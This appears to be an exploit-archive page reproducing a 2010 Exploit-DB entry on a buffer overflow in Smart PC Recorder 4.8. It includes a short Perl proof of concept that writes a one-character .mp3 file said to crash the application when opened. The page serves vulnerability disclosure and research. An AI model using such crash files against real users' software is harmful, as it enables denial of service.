header-logo
Suggest Exploit
vendor:
Smart PC Recorder
by:
chap0
7,5
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: Smart PC Recorder
Affected Version From: 4.8
Affected Version To: 4.8
Patch Exists: YES
Related CWE: N/A
CPE: a:voiceemotion:smart_pc_recorder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3/Windows 7
2010

Smart PC Recorder .MP3 Local Crash POC

This exploit is a proof of concept for a buffer overflow vulnerability in Smart PC Recorder .MP3. The exploit creates a malicious .mp3 file with a single character of 'A' which causes the application to crash when opened.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Smart PC Recorder .MP3 Local Crash POC
# Date: March 23, 2010
# Author: chap0
# Software Link: http://www.voiceemotion.com/smartrecorder.htm
# Version: Current Version: 4.8
# Tested on: Windows XP SP3/Windows 7
# Cost USD 19.95

#!/usr/bin/perl

#Glory to God
#Won't Bow to Men, I Defy!

print "| Smart PC Recorder .mp3 Local Crash |\n";
print "| Current Version 4.8 Cost 19.95 USD |\n";
print "| Author: chap0                      |\n";
print "|        Always FUZZ IT OUT!         |\n";

my $ezA = "\x41";
my $file = "2ez.mp3";
open (FILE,">$file") or die "[!]Cannot open file";
print FILE "$ezA";
print "\n\tMP3 Created!\n";

Navigation

Suggest Exploit

Services By CQR